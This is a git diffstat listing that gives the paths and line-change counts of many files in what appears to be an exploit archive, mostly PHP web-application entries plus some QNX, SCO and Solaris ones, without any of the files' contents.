platforms/php/webapps/8350.txt | 50 +- platforms/php/webapps/8351.pl | 178 +- platforms/php/webapps/8355.txt | 68 +- platforms/php/webapps/8357.py | 168 +- platforms/php/webapps/8362.php | 338 +- platforms/php/webapps/8364.txt | 434 +- platforms/php/webapps/8365.txt | 86 +- platforms/php/webapps/8366.txt | 78 +- platforms/php/webapps/8367.txt | 86 +- platforms/php/webapps/8372.txt | 48 +- platforms/php/webapps/8373.txt | 62 +- platforms/php/webapps/8374.txt | 72 +- platforms/php/webapps/8376.php | 918 +- platforms/php/webapps/8380.txt | 62 +- platforms/php/webapps/8382.txt | 128 +- platforms/php/webapps/8385.txt | 62 +- platforms/php/webapps/8394.txt | 70 +- platforms/php/webapps/8395.txt | 58 +- platforms/php/webapps/8408.txt | 192 +- platforms/php/webapps/8409.txt | 44 +- platforms/php/webapps/8414.txt | 80 +- platforms/php/webapps/8415.txt | 98 +- platforms/php/webapps/8417.txt | 74 +- platforms/php/webapps/8423.txt | 62 +- platforms/php/webapps/8424.txt | 160 +- platforms/php/webapps/8425.txt | 118 +- platforms/php/webapps/8431.txt | 36 +- platforms/php/webapps/8432.txt | 174 +- platforms/php/webapps/8433.txt | 56 +- platforms/php/webapps/8435.txt | 91 +- platforms/php/webapps/8436.txt | 99 +- platforms/php/webapps/8437.txt | 95 +- platforms/php/webapps/8438.txt | 91 +- platforms/php/webapps/8439.txt | 95 +- platforms/php/webapps/8440.txt | 91 +- platforms/php/webapps/8441.txt | 91 +- platforms/php/webapps/8442.txt | 93 +- platforms/php/webapps/8443.txt | 132 +- platforms/php/webapps/8446.txt | 54 +- platforms/php/webapps/8449.txt | 224 +- platforms/php/webapps/8450.txt | 78 +- platforms/php/webapps/8453.txt | 242 +- platforms/php/webapps/8454.txt | 62 +- platforms/php/webapps/8455.txt | 100 +- platforms/php/webapps/8457.txt | 50 +- platforms/php/webapps/8459.htm | 124 +- platforms/php/webapps/8460.txt | 58 +- platforms/php/webapps/8461.txt | 90 +- platforms/php/webapps/8468.txt | 84 +- platforms/php/webapps/8471.txt | 400 +- platforms/php/webapps/8472.txt | 268 +- platforms/php/webapps/8473.pl | 664 +- platforms/php/webapps/8474.txt | 52 +- platforms/php/webapps/8475.txt | 88 +- platforms/php/webapps/8476.txt | 94 +- platforms/php/webapps/8481.txt | 52 +- platforms/php/webapps/8482.txt | 62 +- platforms/php/webapps/8483.txt | 226 +- platforms/php/webapps/8486.txt | 76 +- platforms/php/webapps/8487.txt | 52 +- platforms/php/webapps/8488.pl | 152 +- platforms/php/webapps/8491.pl | 592 +- platforms/php/webapps/8492.txt | 76 +- platforms/php/webapps/8493.txt | 368 +- platforms/php/webapps/8494.txt | 76 +- platforms/php/webapps/8496.htm | 214 +- platforms/php/webapps/8498.txt | 108 +- platforms/php/webapps/8499.php | 288 +- platforms/php/webapps/8501.txt | 36 +- platforms/php/webapps/8502.txt | 60 +- platforms/php/webapps/8503.txt | 46 +- platforms/php/webapps/8505.txt | 42 +- platforms/php/webapps/8506.txt | 38 +- platforms/php/webapps/8509.txt | 58 +- platforms/php/webapps/8510.txt | 210 +- platforms/php/webapps/8513.pl | 294 +- platforms/php/webapps/8514.txt | 60 +- platforms/php/webapps/8515.txt | 78 +- platforms/php/webapps/8516.txt | 90 +- platforms/php/webapps/8521.txt | 320 +- platforms/php/webapps/8538.txt | 50 +- platforms/php/webapps/8543.php | 316 +- platforms/php/webapps/8545.txt | 78 +- platforms/php/webapps/8547.txt | 360 +- platforms/php/webapps/8548.txt | 54 +- platforms/php/webapps/8549.txt | 52 +- platforms/php/webapps/8550.txt | 58 +- platforms/php/webapps/8551.txt | 58 +- platforms/php/webapps/8552.txt | 58 +- platforms/php/webapps/8553.htm | 104 +- platforms/php/webapps/8555.txt | 42 +- platforms/php/webapps/8557.htm | 86 +- platforms/php/webapps/8558.txt | 254 +- platforms/php/webapps/8559.c | 250 +- platforms/php/webapps/8563.txt | 92 +- platforms/php/webapps/8565.txt | 248 +- platforms/php/webapps/8566.txt | 96 +- platforms/php/webapps/8567.txt | 66 +- platforms/php/webapps/857.txt | 6 +- platforms/php/webapps/8571.txt | 106 +- platforms/php/webapps/8576.pl | 658 +- platforms/php/webapps/8577.txt | 364 +- platforms/php/webapps/858.txt | 6 +- platforms/php/webapps/8585.txt | 66 +- platforms/php/webapps/8586.txt | 242 +- platforms/php/webapps/8587.htm | 240 +- platforms/php/webapps/8593.txt | 32 +- platforms/php/webapps/8599.txt | 54 +- platforms/php/webapps/860.c | 6 +- platforms/php/webapps/8600.txt | 50 +- platforms/php/webapps/8602.txt | 52 +- platforms/php/webapps/8603.php | 340 +- platforms/php/webapps/8604.txt | 80 +- platforms/php/webapps/8605.txt | 54 +- platforms/php/webapps/8608.txt | 256 +- platforms/php/webapps/8609.pl | 102 +- platforms/php/webapps/8615.txt | 330 +- platforms/php/webapps/8616.pl | 610 +- platforms/php/webapps/8618.txt | 60 +- platforms/php/webapps/8622.pl | 404 +- platforms/php/webapps/8626.txt | 72 +- platforms/php/webapps/8635.txt | 50 +- platforms/php/webapps/8636.txt | 330 +- platforms/php/webapps/8638.htm | 74 +- platforms/php/webapps/8639.htm | 176 +- platforms/php/webapps/864.txt | 6 +- platforms/php/webapps/8642.txt | 52 +- platforms/php/webapps/8643.txt | 62 +- platforms/php/webapps/8645.txt | 242 +- platforms/php/webapps/8647.txt | 56 +- platforms/php/webapps/8648.pl | 476 +- platforms/php/webapps/8649.php | 266 +- platforms/php/webapps/865.txt | 6 +- platforms/php/webapps/8652.pl | 118 +- platforms/php/webapps/8653.txt | 66 +- platforms/php/webapps/8654.txt | 18 +- platforms/php/webapps/8658.txt | 140 +- platforms/php/webapps/8659.php | 550 +- platforms/php/webapps/866.c | 6 +- platforms/php/webapps/8664.pl | 582 +- platforms/php/webapps/8667.txt | 100 +- platforms/php/webapps/8668.txt | 76 +- platforms/php/webapps/8671.pl | 692 +- platforms/php/webapps/8672.php | 140 +- platforms/php/webapps/8674.txt | 52 +- platforms/php/webapps/8675.txt | 180 +- platforms/php/webapps/8676.txt | 58 +- platforms/php/webapps/8679.txt | 268 +- platforms/php/webapps/8681.php | 234 +- platforms/php/webapps/8682.txt | 44 +- platforms/php/webapps/8683.txt | 46 +- platforms/php/webapps/8684.txt | 42 +- platforms/php/webapps/8685.txt | 42 +- platforms/php/webapps/8686.txt | 42 +- platforms/php/webapps/8687.txt | 42 +- platforms/php/webapps/8688.txt | 42 +- platforms/php/webapps/8689.txt | 172 +- platforms/php/webapps/8690.txt | 425 +- platforms/php/webapps/8691.txt | 220 +- platforms/php/webapps/8692.txt | 38 +- platforms/php/webapps/8694.txt | 38 +- platforms/php/webapps/8697.txt | 46 +- platforms/php/webapps/8699.php | 432 +- platforms/php/webapps/870.txt | 6 +- platforms/php/webapps/8700.txt | 118 +- platforms/php/webapps/8702.txt | 54 +- platforms/php/webapps/8706.pl | 446 +- platforms/php/webapps/8707.txt | 364 +- platforms/php/webapps/8708.txt | 360 +- platforms/php/webapps/8709.txt | 206 +- platforms/php/webapps/871.txt | 6 +- platforms/php/webapps/8710.txt | 52 +- platforms/php/webapps/8711.txt | 62 +- platforms/php/webapps/8713.txt | 552 +- platforms/php/webapps/8714.txt | 66 +- platforms/php/webapps/8715.txt | 58 +- platforms/php/webapps/8717.txt | 94 +- platforms/php/webapps/8718.txt | 204 +- platforms/php/webapps/872.pl | 6 +- platforms/php/webapps/8724.txt | 46 +- platforms/php/webapps/8725.php | 76 +- platforms/php/webapps/8727.txt | 22 +- platforms/php/webapps/8728.htm | 146 +- platforms/php/webapps/8730.txt | 105 +- platforms/php/webapps/8731.php | 144 +- platforms/php/webapps/8735.txt | 90 +- platforms/php/webapps/8736.pl | 400 +- platforms/php/webapps/8737.txt | 66 +- platforms/php/webapps/8738.txt | 346 +- platforms/php/webapps/8739.txt | 458 +- platforms/php/webapps/8740.pl | 540 +- platforms/php/webapps/8741.txt | 48 +- platforms/php/webapps/8743.txt | 250 +- platforms/php/webapps/8745.txt | 124 +- platforms/php/webapps/8746.txt | 98 +- platforms/php/webapps/8747.txt | 100 +- platforms/php/webapps/8748.txt | 60 +- platforms/php/webapps/8750.txt | 54 +- platforms/php/webapps/8751.txt | 58 +- platforms/php/webapps/8752.txt | 234 +- platforms/php/webapps/8755.txt | 44 +- platforms/php/webapps/8759.txt | 344 +- platforms/php/webapps/8761.txt | 104 +- platforms/php/webapps/8762.txt | 34 +- platforms/php/webapps/8763.txt | 42 +- platforms/php/webapps/8764.txt | 38 +- platforms/php/webapps/8766.txt | 46 +- platforms/php/webapps/8769.txt | 79 +- platforms/php/webapps/8771.htm | 82 +- platforms/php/webapps/8773.txt | 77 +- platforms/php/webapps/8774.htm | 138 +- platforms/php/webapps/8775.txt | 86 +- platforms/php/webapps/8776.txt | 90 +- platforms/php/webapps/8778.txt | 356 +- platforms/php/webapps/8779.txt | 256 +- platforms/php/webapps/8781.txt | 144 +- platforms/php/webapps/8784.txt | 52 +- platforms/php/webapps/8787.txt | 40 +- platforms/php/webapps/8788.txt | 62 +- platforms/php/webapps/8790.pl | 440 +- platforms/php/webapps/8791.txt | 114 +- platforms/php/webapps/8792.txt | 76 +- platforms/php/webapps/8793.txt | 88 +- platforms/php/webapps/8795.htm | 56 +- platforms/php/webapps/8796.htm | 88 +- platforms/php/webapps/8797.txt | 146 +- platforms/php/webapps/8801.txt | 140 +- platforms/php/webapps/8802.txt | 92 +- platforms/php/webapps/8803.txt | 34 +- platforms/php/webapps/8805.txt | 43 +- platforms/php/webapps/8807.htm | 518 +- platforms/php/webapps/8808.txt | 100 +- platforms/php/webapps/8809.htm | 518 +- platforms/php/webapps/881.txt | 6 +- platforms/php/webapps/8810.txt | 76 +- platforms/php/webapps/8811.txt | 146 +- platforms/php/webapps/8812.txt | 82 +- platforms/php/webapps/8813.txt | 54 +- platforms/php/webapps/8816.txt | 54 +- platforms/php/webapps/8817.txt | 90 +- platforms/php/webapps/8818.txt | 258 +- platforms/php/webapps/8819.txt | 544 +- platforms/php/webapps/8821.txt | 90 +- platforms/php/webapps/8825.txt | 62 +- platforms/php/webapps/8827.txt | 136 +- platforms/php/webapps/8828.txt | 210 +- platforms/php/webapps/8829.txt | 326 +- platforms/php/webapps/8830.txt | 58 +- platforms/php/webapps/8831.txt | 98 +- platforms/php/webapps/8836.txt | 92 +- platforms/php/webapps/8838.txt | 124 +- platforms/php/webapps/8839.txt | 44 +- platforms/php/webapps/8840.txt | 92 +- platforms/php/webapps/8841.txt | 826 +- platforms/php/webapps/8843.pl | 448 +- platforms/php/webapps/8844.txt | 242 +- platforms/php/webapps/8847.txt | 162 +- platforms/php/webapps/8848.txt | 102 +- platforms/php/webapps/8850.txt | 62 +- platforms/php/webapps/8852.txt | 114 +- platforms/php/webapps/8853.txt | 226 +- platforms/php/webapps/8855.txt | 128 +- platforms/php/webapps/8856.txt | 99 +- platforms/php/webapps/8857.txt | 58 +- platforms/php/webapps/8858.txt | 54 +- platforms/php/webapps/8860.txt | 106 +- platforms/php/webapps/8864.txt | 48 +- platforms/php/webapps/8865.txt | 178 +- platforms/php/webapps/8866.php | 352 +- platforms/php/webapps/8867.pl | 184 +- platforms/php/webapps/8868.txt | 108 +- platforms/php/webapps/8870.txt | 96 +- platforms/php/webapps/8871.txt | 58 +- platforms/php/webapps/8872.txt | 132 +- platforms/php/webapps/8874.txt | 80 +- platforms/php/webapps/8876.htm | 58 +- platforms/php/webapps/8877.txt | 80 +- platforms/php/webapps/8878.txt | 72 +- platforms/php/webapps/8879.htm | 288 +- platforms/php/webapps/8882.txt | 46 +- platforms/php/webapps/8883.txt | 42 +- platforms/php/webapps/8884.txt | 196 +- platforms/php/webapps/8885.pl | 508 +- platforms/php/webapps/8886.txt | 54 +- platforms/php/webapps/889.pl | 6 +- platforms/php/webapps/8891.txt | 82 +- platforms/php/webapps/8892.txt | 46 +- platforms/php/webapps/8893.txt | 66 +- platforms/php/webapps/8894.txt | 66 +- platforms/php/webapps/8898.txt | 82 +- platforms/php/webapps/8900.txt | 58 +- platforms/php/webapps/8901.txt | 60 +- platforms/php/webapps/8902.htm | 38 +- platforms/php/webapps/8903.txt | 56 +- platforms/php/webapps/8904.txt | 146 +- platforms/php/webapps/8905.txt | 66 +- platforms/php/webapps/8906.pl | 326 +- platforms/php/webapps/8908.txt | 48 +- platforms/php/webapps/8911.txt | 62 +- platforms/php/webapps/8912.txt | 48 +- platforms/php/webapps/8913.txt | 232 +- platforms/php/webapps/8914.txt | 354 +- platforms/php/webapps/8915.pl | 556 +- platforms/php/webapps/8917.txt | 56 +- platforms/php/webapps/8918.txt | 38 +- platforms/php/webapps/8919.txt | 48 +- platforms/php/webapps/892.txt | 6 +- platforms/php/webapps/8920.txt | 48 +- platforms/php/webapps/8921.sh | 216 +- platforms/php/webapps/8923.txt | 236 +- platforms/php/webapps/8924.txt | 76 +- platforms/php/webapps/8925.txt | 30 +- platforms/php/webapps/8926.txt | 74 +- platforms/php/webapps/8927.pl | 496 +- platforms/php/webapps/8928.txt | 98 +- platforms/php/webapps/8929.txt | 276 +- platforms/php/webapps/8931.txt | 94 +- platforms/php/webapps/8932.txt | 112 +- platforms/php/webapps/8933.php | 56 +- platforms/php/webapps/8935.txt | 74 +- platforms/php/webapps/8936.txt | 288 +- platforms/php/webapps/8937.txt | 102 +- platforms/php/webapps/8939.pl | 354 +- platforms/php/webapps/8941.txt | 166 +- platforms/php/webapps/8942.txt | 136 +- platforms/php/webapps/8943.txt | 126 +- platforms/php/webapps/8946.txt | 68 +- platforms/php/webapps/8947.txt | 70 +- platforms/php/webapps/8948.txt | 100 +- platforms/php/webapps/8949.txt | 400 +- platforms/php/webapps/8950.txt | 524 +- platforms/php/webapps/8951.php | 326 +- platforms/php/webapps/8952.txt | 60 +- platforms/php/webapps/8953.txt | 260 +- platforms/php/webapps/8954.txt | 53 +- platforms/php/webapps/8956.htm | 76 +- platforms/php/webapps/8958.txt | 1348 +- platforms/php/webapps/8959.pl | 174 +- platforms/php/webapps/8961.txt | 42 +- platforms/php/webapps/8962.txt | 30 +- platforms/php/webapps/8967.txt | 82 +- platforms/php/webapps/8968.txt | 218 +- platforms/php/webapps/8974.txt | 229 +- platforms/php/webapps/8975.txt | 38 +- platforms/php/webapps/8977.txt | 74 +- platforms/php/webapps/8978.txt | 156 +- platforms/php/webapps/8979.txt | 228 +- platforms/php/webapps/8980.py | 446 +- platforms/php/webapps/8981.txt | 42 +- platforms/php/webapps/8984.txt | 134 +- platforms/php/webapps/8988.txt | 288 +- platforms/php/webapps/8990.txt | 48 +- platforms/php/webapps/8992.php | 610 +- platforms/php/webapps/8993.txt | 214 +- platforms/php/webapps/8994.txt | 28 +- platforms/php/webapps/8996.txt | 36 +- platforms/php/webapps/8997.txt | 114 +- platforms/php/webapps/8998.txt | 76 +- platforms/php/webapps/8999.txt | 86 +- platforms/php/webapps/9000.txt | 56 +- platforms/php/webapps/9001.php | 862 +- platforms/php/webapps/9004.txt | 1468 +- platforms/php/webapps/9005.py | 116 +- platforms/php/webapps/9009.txt | 34 +- platforms/php/webapps/9010.txt | 40 +- platforms/php/webapps/9011.txt | 78 +- platforms/php/webapps/9014.txt | 100 +- platforms/php/webapps/9015.txt | 38 +- platforms/php/webapps/9016.txt | 82 +- platforms/php/webapps/9017.txt | 74 +- platforms/php/webapps/9019.txt | 308 +- platforms/php/webapps/9020.py | 574 +- platforms/php/webapps/9021.txt | 76 +- platforms/php/webapps/9022.txt | 89 +- platforms/php/webapps/9023.txt | 262 +- platforms/php/webapps/9024.txt | 48 +- platforms/php/webapps/9025.txt | 36 +- platforms/php/webapps/9026.txt | 104 +- platforms/php/webapps/9027.txt | 88 +- platforms/php/webapps/9028.txt | 236 +- platforms/php/webapps/9032.txt | 76 +- platforms/php/webapps/9035.txt | 176 +- platforms/php/webapps/9036.txt | 40 +- platforms/php/webapps/9037.txt | 42 +- platforms/php/webapps/9040.txt | 102 +- platforms/php/webapps/9041.txt | 52 +- platforms/php/webapps/9042.pl | 520 +- platforms/php/webapps/9043.txt | 50 +- platforms/php/webapps/9044.txt | 48 +- platforms/php/webapps/9048.txt | 22 +- platforms/php/webapps/9049.txt | 22 +- platforms/php/webapps/9051.txt | 42 +- platforms/php/webapps/9052.txt | 48 +- platforms/php/webapps/9053.txt | 70 +- platforms/php/webapps/9055.pl | 220 +- platforms/php/webapps/9056.txt | 42 +- platforms/php/webapps/9057.txt | 414 +- platforms/php/webapps/9059.htm | 44 +- platforms/php/webapps/9062.txt | 42 +- platforms/php/webapps/9063.txt | 34 +- platforms/php/webapps/9068.txt | 220 +- platforms/php/webapps/9069.txt | 276 +- platforms/php/webapps/907.pl | 6 +- platforms/php/webapps/9073.php | 54 +- platforms/php/webapps/9075.txt | 38 +- platforms/php/webapps/9076.php | 402 +- platforms/php/webapps/9077.txt | 72 +- platforms/php/webapps/9079.txt | 98 +- platforms/php/webapps/9080.txt | 38 +- platforms/php/webapps/9081.txt | 102 +- platforms/php/webapps/9086.txt | 48 +- platforms/php/webapps/9087.php | 300 +- platforms/php/webapps/9088.txt | 98 +- platforms/php/webapps/9089.txt | 62 +- platforms/php/webapps/9091.php | 402 +- platforms/php/webapps/9092.txt | 80 +- platforms/php/webapps/9094.txt | 70 +- platforms/php/webapps/9095.txt | 42 +- platforms/php/webapps/9098.txt | 148 +- platforms/php/webapps/9099.pl | 78 +- platforms/php/webapps/910.pl | 6 +- platforms/php/webapps/9101.txt | 136 +- platforms/php/webapps/9103.txt | 86 +- platforms/php/webapps/9105.txt | 54 +- platforms/php/webapps/9107.txt | 56 +- platforms/php/webapps/9109.txt | 164 +- platforms/php/webapps/9110.txt | 966 +- platforms/php/webapps/9111.txt | 90 +- platforms/php/webapps/9112.txt | 67 +- platforms/php/webapps/9115.txt | 42 +- platforms/php/webapps/9118.txt | 94 +- platforms/php/webapps/9119.txt | 38 +- platforms/php/webapps/9121.php | 142 +- platforms/php/webapps/9122.txt | 78 +- platforms/php/webapps/9125.txt | 68 +- platforms/php/webapps/9126.txt | 68 +- platforms/php/webapps/9127.txt | 166 +- platforms/php/webapps/9129.txt | 68 +- platforms/php/webapps/9132.py | 236 +- platforms/php/webapps/9138.txt | 52 +- platforms/php/webapps/9145.php | 474 +- platforms/php/webapps/9150.txt | 74 +- platforms/php/webapps/9151.txt | 518 +- platforms/php/webapps/9153.txt | 54 +- platforms/php/webapps/9154.js | 1176 +- platforms/php/webapps/9155.txt | 46 +- platforms/php/webapps/9156.py | 82 +- platforms/php/webapps/9159.php | 190 +- platforms/php/webapps/9161.txt | 54 +- platforms/php/webapps/9162.txt | 26 +- platforms/php/webapps/9164.txt | 26 +- platforms/php/webapps/9165.pl | 96 +- platforms/php/webapps/9166.txt | 298 +- platforms/php/webapps/9171.txt | 48 +- platforms/php/webapps/9174.txt | 149 +- platforms/php/webapps/9176.txt | 106 +- platforms/php/webapps/9179.txt | 40 +- platforms/php/webapps/9180.txt | 40 +- platforms/php/webapps/9182.txt | 40 +- platforms/php/webapps/9183.txt | 70 +- platforms/php/webapps/9184.txt | 34 +- platforms/php/webapps/9185.txt | 90 +- platforms/php/webapps/9193.pl | 84 +- platforms/php/webapps/9195.txt | 118 +- platforms/php/webapps/9202.txt | 50 +- platforms/php/webapps/9203.txt | 72 +- platforms/php/webapps/9204.txt | 132 +- platforms/php/webapps/9205.txt | 152 +- platforms/php/webapps/921.sh | 6 +- platforms/php/webapps/9211.txt | 100 +- platforms/php/webapps/9217.txt | 66 +- platforms/php/webapps/9219.txt | 99 +- platforms/php/webapps/9226.txt | 76 +- platforms/php/webapps/9227.txt | 92 +- platforms/php/webapps/9231.txt | 178 +- platforms/php/webapps/9235.php | 156 +- platforms/php/webapps/9236.txt | 78 +- platforms/php/webapps/9237.txt | 126 +- platforms/php/webapps/9238.txt | 44 +- platforms/php/webapps/9239.txt | 180 +- platforms/php/webapps/9243.txt | 114 +- platforms/php/webapps/9244.txt | 70 +- platforms/php/webapps/9245.pl | 330 +- platforms/php/webapps/9246.txt | 110 +- platforms/php/webapps/9249.txt | 46 +- platforms/php/webapps/9250.sh | 76 +- platforms/php/webapps/9251.txt | 64 +- platforms/php/webapps/9252.txt | 304 +- platforms/php/webapps/9254.txt | 58 +- platforms/php/webapps/9256.txt | 163 +- platforms/php/webapps/9257.php | 200 +- platforms/php/webapps/9258.txt | 106 +- platforms/php/webapps/9259.txt | 106 +- platforms/php/webapps/9260.txt | 106 +- platforms/php/webapps/9261.txt | 124 +- platforms/php/webapps/9262.txt | 106 +- platforms/php/webapps/9263.txt | 158 +- platforms/php/webapps/9266.txt | 56 +- platforms/php/webapps/9267.txt | 44 +- platforms/php/webapps/9269.txt | 78 +- platforms/php/webapps/9271.txt | 120 +- platforms/php/webapps/9273.php | 488 +- platforms/php/webapps/9275.php | 488 +- platforms/php/webapps/9276.txt | 100 +- platforms/php/webapps/9279.pl | 224 +- platforms/php/webapps/928.py | 6 +- platforms/php/webapps/9280.pl | 224 +- platforms/php/webapps/9281.txt | 84 +- platforms/php/webapps/9282.txt | 82 +- platforms/php/webapps/9283.txt | 76 +- platforms/php/webapps/9287.txt | 24 +- platforms/php/webapps/9288.txt | 42 +- platforms/php/webapps/9290.txt | 86 +- platforms/php/webapps/9292.txt | 44 +- platforms/php/webapps/9293.txt | 44 +- platforms/php/webapps/9294.txt | 44 +- platforms/php/webapps/9296.txt | 198 +- platforms/php/webapps/9297.txt | 88 +- platforms/php/webapps/9307.txt | 98 +- platforms/php/webapps/9308.txt | 52 +- platforms/php/webapps/9309.txt | 194 +- platforms/php/webapps/9310.txt | 94 +- platforms/php/webapps/9311.txt | 52 +- platforms/php/webapps/9312.txt | 74 +- platforms/php/webapps/9313.txt | 64 +- platforms/php/webapps/9314.txt | 54 +- platforms/php/webapps/9315.pl | 194 +- platforms/php/webapps/9316.txt | 108 +- platforms/php/webapps/9322.txt | 178 +- platforms/php/webapps/9324.txt | 290 +- platforms/php/webapps/9325.txt | 50 +- platforms/php/webapps/9326.txt | 62 +- platforms/php/webapps/9331.txt | 44 +- platforms/php/webapps/9332.txt | 30 +- platforms/php/webapps/9333.txt | 52 +- platforms/php/webapps/9334.txt | 72 +- platforms/php/webapps/9335.txt | 46 +- platforms/php/webapps/9336.txt | 42 +- platforms/php/webapps/9337.txt | 38 +- platforms/php/webapps/9338.txt | 104 +- platforms/php/webapps/9339.txt | 100 +- platforms/php/webapps/9340.txt | 118 +- platforms/php/webapps/9341.txt | 38 +- platforms/php/webapps/9342.txt | 111 +- platforms/php/webapps/9344.txt | 68 +- platforms/php/webapps/9347.txt | 162 +- platforms/php/webapps/9350.txt | 82 +- platforms/php/webapps/9351.txt | 86 +- platforms/php/webapps/9353.txt | 50 +- platforms/php/webapps/9355.txt | 66 +- platforms/php/webapps/9356.txt | 74 +- platforms/php/webapps/9358.txt | 72 +- platforms/php/webapps/9365.txt | 48 +- platforms/php/webapps/9367.txt | 80 +- platforms/php/webapps/9369.txt | 146 +- platforms/php/webapps/9370.txt | 90 +- platforms/php/webapps/9371.txt | 84 +- platforms/php/webapps/9378.txt | 110 +- platforms/php/webapps/9380.txt | 66 +- platforms/php/webapps/9383.txt | 78 +- platforms/php/webapps/9384.txt | 134 +- platforms/php/webapps/9385.txt | 76 +- platforms/php/webapps/9387.tx | 77 +- platforms/php/webapps/9389.txt | 96 +- platforms/php/webapps/939.pl | 6 +- platforms/php/webapps/9390.txt | 70 +- platforms/php/webapps/9394.pl | 424 +- platforms/php/webapps/9395.txt | 50 +- platforms/php/webapps/9396.txt | 100 +- platforms/php/webapps/9397.txt | 121 +- platforms/php/webapps/9398.php | 188 +- platforms/php/webapps/9399.txt | 72 +- platforms/php/webapps/9400.txt | 80 +- platforms/php/webapps/9404.txt | 56 +- platforms/php/webapps/9405.txt | 286 +- platforms/php/webapps/9406.txt | 90 +- platforms/php/webapps/9407.txt | 66 +- platforms/php/webapps/9408.php | 168 +- platforms/php/webapps/9410.txt | 264 +- platforms/php/webapps/9413.txt | 66 +- platforms/php/webapps/9416.txt | 52 +- platforms/php/webapps/9419.txt | 84 +- platforms/php/webapps/9421.txt | 52 +- platforms/php/webapps/9424.txt | 174 +- platforms/php/webapps/9425.sh | 114 +- platforms/php/webapps/9430.pl | 252 +- platforms/php/webapps/9431.txt | 316 +- platforms/php/webapps/9433.txt | 78 +- platforms/php/webapps/9434.txt | 322 +- platforms/php/webapps/9437.txt | 49 +- platforms/php/webapps/9438.txt | 78 +- platforms/php/webapps/9440.txt | 52 +- platforms/php/webapps/9441.txt | 62 +- platforms/php/webapps/9444.txt | 66 +- platforms/php/webapps/9445.py | 64 +- platforms/php/webapps/9448.py | 124 +- platforms/php/webapps/9450.txt | 1268 +- platforms/php/webapps/9451.txt | 74 +- platforms/php/webapps/9452.pl | 212 +- platforms/php/webapps/9460.txt | 82 +- platforms/php/webapps/9461.txt | 68 +- platforms/php/webapps/9462.txt | 122 +- platforms/php/webapps/9463.php | 270 +- platforms/php/webapps/9464.txt | 82 +- platforms/php/webapps/9465.txt | 84 +- platforms/php/webapps/9469.txt | 78 +- platforms/php/webapps/9470.txt | 68 +- platforms/php/webapps/9471.txt | 84 +- platforms/php/webapps/9472.txt | 94 +- platforms/php/webapps/9474.rb | 194 +- platforms/php/webapps/9475.txt | 30 +- platforms/php/webapps/9481.txt | 54 +- platforms/php/webapps/9482.txt | 52 +- platforms/php/webapps/9484.txt | 90 +- platforms/php/webapps/9485.txt | 24 +- platforms/php/webapps/9490.txt | 52 +- platforms/php/webapps/9493.txt | 40 +- platforms/php/webapps/9494.txt | 52 +- platforms/php/webapps/9497.pl | 236 +- platforms/php/webapps/9499.txt | 30 +- platforms/php/webapps/9502.txt | 84 +- platforms/php/webapps/9504.txt | 84 +- platforms/php/webapps/9510.txt | 92 +- platforms/php/webapps/9511.txt | 76 +- platforms/php/webapps/9512.txt | 56 +- platforms/php/webapps/9518.txt | 76 +- platforms/php/webapps/9522.txt | 110 +- platforms/php/webapps/9523.txt | 76 +- platforms/php/webapps/9524.txt | 90 +- platforms/php/webapps/9525.txt | 30 +- platforms/php/webapps/9527.txt | 80 +- platforms/php/webapps/9529.txt | 86 +- platforms/php/webapps/9531.txt | 88 +- platforms/php/webapps/9532.txt | 80 +- platforms/php/webapps/9533.txt | 76 +- platforms/php/webapps/9534.txt | 92 +- platforms/php/webapps/9535.txt | 76 +- platforms/php/webapps/9538.txt | 80 +- platforms/php/webapps/9544.txt | 72 +- platforms/php/webapps/9553.txt | 102 +- platforms/php/webapps/9555.txt | 78 +- platforms/php/webapps/9556.php | 74 +- platforms/php/webapps/9563.txt | 98 +- platforms/php/webapps/9564.txt | 96 +- platforms/php/webapps/9565.txt | 100 +- platforms/php/webapps/9566.txt | 46 +- platforms/php/webapps/9569.txt | 52 +- platforms/php/webapps/9570.txt | 48 +- platforms/php/webapps/9571.txt | 110 +- platforms/php/webapps/9572.txt | 56 +- platforms/php/webapps/9576.txt | 82 +- platforms/php/webapps/9577.txt | 62 +- platforms/php/webapps/9578.txt | 122 +- platforms/php/webapps/9582.txt | 104 +- platforms/php/webapps/9583.txt | 70 +- platforms/php/webapps/9588.txt | 164 +- platforms/php/webapps/9590.c | 880 +- platforms/php/webapps/9591.txt | 108 +- platforms/php/webapps/9593.txt | 100 +- platforms/php/webapps/9599.txt | 60 +- platforms/php/webapps/9600.txt | 70 +- platforms/php/webapps/9601.php | 84 +- platforms/php/webapps/9603.txt | 98 +- platforms/php/webapps/9604.txt | 72 +- platforms/php/webapps/9605.pl | 288 +- platforms/php/webapps/9609.txt | 104 +- platforms/php/webapps/9611.txt | 48 +- platforms/php/webapps/9629.txt | 20 +- platforms/php/webapps/9630.txt | 82 +- platforms/php/webapps/9631.txt | 76 +- platforms/php/webapps/9632.txt | 72 +- platforms/php/webapps/9633.txt | 78 +- platforms/php/webapps/9634.txt | 88 +- platforms/php/webapps/9635.txt | 92 +- platforms/php/webapps/9636.txt | 36 +- platforms/php/webapps/9639.txt | 36 +- platforms/php/webapps/9640.txt | 104 +- platforms/php/webapps/9647.txt | 69 +- platforms/php/webapps/9648.txt | 250 +- platforms/php/webapps/9653.txt | 18 +- platforms/php/webapps/9654.php | 258 +- platforms/php/webapps/9656.txt | 100 +- platforms/php/webapps/9665.pl | 272 +- platforms/php/webapps/9669.txt | 24 +- platforms/php/webapps/9681.txt | 44 +- platforms/php/webapps/9692.txt | 114 +- platforms/php/webapps/9696.txt | 46 +- platforms/php/webapps/9697.txt | 98 +- platforms/php/webapps/9698.pl | 190 +- platforms/php/webapps/9699.txt | 82 +- platforms/php/webapps/9700.rb | 382 +- platforms/php/webapps/9702.txt | 36 +- platforms/php/webapps/9703.txt | 46 +- platforms/php/webapps/9706.txt | 52 +- platforms/php/webapps/9708.txt | 88 +- platforms/php/webapps/9710.txt | 52 +- platforms/php/webapps/9711.txt | 64 +- platforms/php/webapps/9712.txt | 54 +- platforms/php/webapps/9713.pl | 302 +- platforms/php/webapps/982.c | 6 +- platforms/php/webapps/989.pl | 6 +- platforms/php/webapps/9890.txt | 1 - platforms/php/webapps/996.pl | 6 +- platforms/plan9/local/3383.c | 1740 +-- platforms/qnx/dos/7823.txt | 392 +- platforms/qnx/local/1347.c | 180 +- platforms/qnx/local/1479.sh | 44 +- platforms/qnx/local/1481.sh | 42 +- platforms/sco/local/1402.c | 118 +- platforms/sco/local/1534.c | 176 +- platforms/sco/local/261.c | 6 +- platforms/sco/local/5355.sh | 46 +- platforms/sco/local/5356.c | 168 +- platforms/sco/local/5357.c | 178 +- platforms/sco/local/602.c | 6 +- platforms/sco_x86/shellcode/13488.c | 70 +- platforms/solaris/dos/235.pl | 6 +- platforms/solaris/dos/240.sh | 6 